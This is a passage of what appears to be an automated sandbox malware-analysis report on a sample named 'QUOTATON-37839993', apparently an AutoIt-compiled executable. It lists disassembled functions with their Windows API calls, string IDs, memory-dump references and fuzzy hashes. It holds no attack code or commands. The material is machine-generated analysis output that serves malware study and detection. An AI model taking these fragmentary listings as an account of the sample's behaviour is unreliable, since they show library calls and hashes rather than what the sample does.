                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 00E5B4BE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ContainedObject
                                                                      • String ID: AutoIt3GUI$Container$%
                                                                      • API String ID: 3565006973-1286912533
                                                                      • Opcode ID: aa1e98e34acd33665776f4852c72f8e4fc9d5bc32dae1e02c3e153b03d173de7
                                                                      • Instruction ID: 82976ee106a7a0cbf8fb33bad59f64c3e664266c01889050e35e077dfc55c064
                                                                      • Opcode Fuzzy Hash: aa1e98e34acd33665776f4852c72f8e4fc9d5bc32dae1e02c3e153b03d173de7
                                                                      • Instruction Fuzzy Hash: CC915C70600601AFDB14DF64C884B6ABBE9FF48711F20996DFD4AEB691EB70E845CB50
                                                                      Function 00E2501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __startOneArgErrorHandling.LIBCMT ref: 00E250AD
                                                                        • Part of subcall function 00E300F0: __87except.LIBCMT ref: 00E3012B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorHandling__87except__start
                                                                      • String ID: pow
                                                                      • API String ID: 2905807303-2276729525
                                                                      • Opcode ID: c15018871e88e36d05c18ee6ee42866fe2eaaa13a2d7b408832a07e4f5ca1dfb
                                                                      • Instruction ID: 904cc596b7eb16e94838e98ee1bb223cd9d260ea21ac538ad6ae5f4753071dab
                                                                      • Opcode Fuzzy Hash: c15018871e88e36d05c18ee6ee42866fe2eaaa13a2d7b408832a07e4f5ca1dfb
                                                                      • Instruction Fuzzy Hash: 0551AF2290D9018ADB117724DE297BF2FD0AB40704F20AD59E4D5B62AADE348DD8DB82
                                                                      Function 00E48584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: 3c$_
                                                                      • API String ID: 4104443479-4099079164
                                                                      • Opcode ID: a42eff83153c2f5632c3f961f1be5060dc1f49fb7a44840bb75c63521edf1a87
                                                                      • Instruction ID: 5ee055a8027e540ee4e31e17a5880eb777488a4d3516dc057444bea10329d2dc
                                                                      • Opcode Fuzzy Hash: a42eff83153c2f5632c3f961f1be5060dc1f49fb7a44840bb75c63521edf1a87
                                                                      • Instruction Fuzzy Hash: FE516EB09006159FCB64CF68D980AEEB7F1FF44314F14856AE85AE7350EB30A995CB51
                                                                      Function 00E597F5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00E614BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E59296,?,?,00000034,00000800,?,00000034), ref: 00E614E6
                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E5983F
                                                                        • Part of subcall function 00E61487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E592C5,?,?,00000800,?,00001073,00000000,?,?), ref: 00E614B1
                                                                        • Part of subcall function 00E613DE: GetWindowThreadProcessId.USER32(?,?), ref: 00E61409
                                                                        • Part of subcall function 00E613DE: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E5925A,00000034,?,?,00001004,00000000,00000000), ref: 00E61419
                                                                        • Part of subcall function 00E613DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E5925A,00000034,?,?,00001004,00000000,00000000), ref: 00E6142F
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E598AC
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E598F9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      • Opcode ID: b1d8254eb7d5d3ee7d05dcd09555e9f3963714a4179054a38c681e3416fc4764
                                                                      • Instruction ID: 918f710054ff957920c6fc630889471232f38e28b651a487d6302da371a881b8
                                                                      • Opcode Fuzzy Hash: b1d8254eb7d5d3ee7d05dcd09555e9f3963714a4179054a38c681e3416fc4764
                                                                      • Instruction Fuzzy Hash: 4F416176A0121CBFCB11DFA4CC81ADEBBB8EF49340F144199F955B7181DA706E89CBA0
                                                                      Function 00E87946 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00E8F910,00000000,?,?,?,?), ref: 00E879DF
                                                                      • GetWindowLongW.USER32 ref: 00E879FC
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00E87A0C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID: SysTreeView32
                                                                      • API String ID: 847901565-1698111956
                                                                      • Opcode ID: 026f2a09455ec386dd91e4b5df452509891ff10c19f82ada6b0cd349ac4ddc89
                                                                      • Instruction ID: bf741008243550f33c37f42b79dc9e2746c16576ccd212d58be7605dc215cce3
                                                                      • Opcode Fuzzy Hash: 026f2a09455ec386dd91e4b5df452509891ff10c19f82ada6b0cd349ac4ddc89
                                                                      • Instruction Fuzzy Hash: E431E031204206AFDB119F34CC45BEA77A9EB48328F205725F8BDB21E0D731EC919750
                                                                      Function 00E873D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00E87461
                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00E87475
                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E87499
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window
                                                                      • String ID: SysMonthCal32
                                                                      • API String ID: 2326795674-1439706946
                                                                      • Opcode ID: fa41112655da22376ff784bf514e05556559fb72df5a8f6901e54fc1cc31e58a
                                                                      • Instruction ID: 3421b9424e6f584bc96c07c7b43f9b3d452ba4f8caf0a956b0e890b5f8cf0f69
                                                                      • Opcode Fuzzy Hash: fa41112655da22376ff784bf514e05556559fb72df5a8f6901e54fc1cc31e58a
                                                                      • Instruction Fuzzy Hash: 0B21B132500218AFDF11DF94CC46FEA3BA9EB48724F211214FE697B1D0DA75EC959BA0
                                                                      Function 00E87B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00E87C4A
                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00E87C58
                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00E87C5F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$DestroyWindow
                                                                      • String ID: msctls_updown32
                                                                      • API String ID: 4014797782-2298589950
                                                                      • Opcode ID: d2743bc6ba3aa942dd0596f9b8c79a70c560af66b3d7408a85d5415b3071713a
                                                                      • Instruction ID: 9e5a0e6d95d0633fdb613fe8b6e9a6a88693cc0be4d24f0e22019431ec3a8541
                                                                      • Opcode Fuzzy Hash: d2743bc6ba3aa942dd0596f9b8c79a70c560af66b3d7408a85d5415b3071713a
                                                                      • Instruction Fuzzy Hash: B82181B5204208AFDB10EF64DCC5DA777EDEF49358B141459FA49AB3A1CB32EC418BA0
                                                                      Function 00E86CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00E86D3B
                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00E86D4B
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00E86D70
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$MoveWindow
                                                                      • String ID: Listbox
                                                                      • API String ID: 3315199576-2633736733
                                                                      • Opcode ID: 6d45a78d992c1c4d3b43ac214e5f0705e1d9ea07a317c930a92023aecef552b8
                                                                      • Instruction ID: 844e243d05c41f8ba314a2fca9f3ce577f03361da85d75a7c35efe2fdd1f8c58
                                                                      • Opcode Fuzzy Hash: 6d45a78d992c1c4d3b43ac214e5f0705e1d9ea07a317c930a92023aecef552b8
                                                                      • Instruction Fuzzy Hash: 7921C232610118BFDF12AF54DC45FAB3BBAEF89754F019124F94CBB1A0C671AC5187A0
                                                                      Function 00E739E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __snwprintf.LIBCMT ref: 00E73A66
                                                                        • Part of subcall function 00E07DE1: _memmove.LIBCMT ref: 00E07E22
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __snwprintf_memmove
                                                                      • String ID: , $$AUTOITCALLVARIABLE%d$%
                                                                      • API String ID: 3506404897-3879706725
                                                                      • Opcode ID: fa9510ab119590677bb08536518fe6e4a65b041b2eaf1b20e7f0be4130985f63
                                                                      • Instruction ID: 480e7009d64828ca54f51a452789d58559bd81fdc46a131bef0c94bda3a0f080
                                                                      • Opcode Fuzzy Hash: fa9510ab119590677bb08536518fe6e4a65b041b2eaf1b20e7f0be4130985f63
                                                                      • Instruction Fuzzy Hash: 3F218171A00219AACF10EF64CC82AAEB7F9EF44300F406455E489BB281DB30EA45DB61
                                                                      Function 00E8770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00E87772
                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00E87787
                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00E87794
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: msctls_trackbar32
                                                                      • API String ID: 3850602802-1010561917
                                                                      • Opcode ID: e280da7b56fbaac729d18ce395a26d2e74b61824db9812d4984c42a69fa3d852
                                                                      • Instruction ID: 03509847cc767a4d31f073cbc24ccd8e93160bd2cc4e2d9c6260a44756aed0c8
                                                                      • Opcode Fuzzy Hash: e280da7b56fbaac729d18ce395a26d2e74b61824db9812d4984c42a69fa3d852
                                                                      • Instruction Fuzzy Hash: AB113A32244208BFEF106F61CC01FDB77A9EF88B55F110129F689B60D0C272E851CB20
                                                                      Function 00E26B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __calloc_crt
                                                                      • String ID: $@B
                                                                      • API String ID: 3494438863-460053111
                                                                      • Opcode ID: a695052cfcee43a73b4ed655683e813a3551ab8644fe1d1e71bf457754bc7822
                                                                      • Instruction ID: 1f14152977951a474ec3e06d8ae419a0a5c6900e0a2784b724c91ecb4a6927c2
                                                                      • Opcode Fuzzy Hash: a695052cfcee43a73b4ed655683e813a3551ab8644fe1d1e71bf457754bc7822
                                                                      • Instruction Fuzzy Hash: CCF0C872205631CFF7288F15BC51FB267E4E740330F501126E900FE1A0EB3198C646C0
                                                                      Function 00E29B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __lock.LIBCMT ref: 00E29B94
                                                                        • Part of subcall function 00E29C0B: __mtinitlocknum.LIBCMT ref: 00E29C1D
                                                                        • Part of subcall function 00E29C0B: EnterCriticalSection.KERNEL32(00000000,?,00E29A7C,0000000D), ref: 00E29C36
                                                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 00E29BA4
                                                                        • Part of subcall function 00E29100: ___addlocaleref.LIBCMT ref: 00E2911C
                                                                        • Part of subcall function 00E29100: ___removelocaleref.LIBCMT ref: 00E29127
                                                                        • Part of subcall function 00E29100: ___freetlocinfo.LIBCMT ref: 00E2913B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                      • String ID: 8$8
                                                                      • API String ID: 547918592-2648740355
                                                                      • Opcode ID: 8fc0d12386165d0546b49b2b9816d984772ac3164f699d11221388fe43fa2a98
                                                                      • Instruction ID: b40b8151e23ae30c5be3c168a6cd1fe006f8c0e7cac48edb7103818b85fcd611
                                                                      • Opcode Fuzzy Hash: 8fc0d12386165d0546b49b2b9816d984772ac3164f699d11221388fe43fa2a98
                                                                      • Instruction Fuzzy Hash: 82E08C71943320AAEA24BBA47B83BCA66D09B40B21F20329AF049752C2CDB00440861B
                                                                      Function 00E04C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00E04B83,?), ref: 00E04C44
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E04C56
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-1355242751
                                                                      • Opcode ID: 3a3db06ae6c8aeda799638ed1a63048571799a413fabde8e668a5480a6209246
                                                                      • Instruction ID: bb4cf97f73a8541308a5bf156cfb1c557a77e8e2cc0d884f50e134355a187e40
                                                                      • Opcode Fuzzy Hash: 3a3db06ae6c8aeda799638ed1a63048571799a413fabde8e668a5480a6209246
                                                                      • Instruction Fuzzy Hash: ADD0C7B0602713CFE7209F32CA4820AB2E4AF00351B10983ED59AF61A0E670C8C0CB20
                                                                      Function 00E04C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00E04BD0,?,00E04DEF,?,00EC52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E04C11
                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E04C23
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-3689287502
                                                                      • Opcode ID: c19f84948b6954d21604e7c0c07d44295dfa3d228e99a3e33ae89cb06b154665
                                                                      • Instruction ID: 9eddce74343701a350f9ea82b079258bb90d5703ed4f3c6c2ba8ad3fc876a205
                                                                      • Opcode Fuzzy Hash: c19f84948b6954d21604e7c0c07d44295dfa3d228e99a3e33ae89cb06b154665
                                                                      • Instruction Fuzzy Hash: 73D0C2B0502713CFE7206F71CA4820BB6D5EF08352B009C39D489F2190E6B0C4C0C710
                                                                      Function 00E80DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00E81039), ref: 00E80DF5
                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E80E07
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                      • API String ID: 2574300362-4033151799
                                                                      • Opcode ID: 3907188c4773105fe5ac1217bddda2e45a0743fad517e65869fe7a244546f8bc
                                                                      • Instruction ID: a9b27a70f9387c540527dcc8f0cc1452bb31f2193ae18962230ee5c6398c916e
                                                                      • Opcode Fuzzy Hash: 3907188c4773105fe5ac1217bddda2e45a0743fad517e65869fe7a244546f8bc
                                                                      • Instruction Fuzzy Hash: 28D0C730581322CFCB20AF72C8082C372E4AF04342F00AC3ED58EF2152E6B0D894CB60
                                                                      Function 00E790E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00E78CF4,?,00E8F910), ref: 00E790EE
                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E79100
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
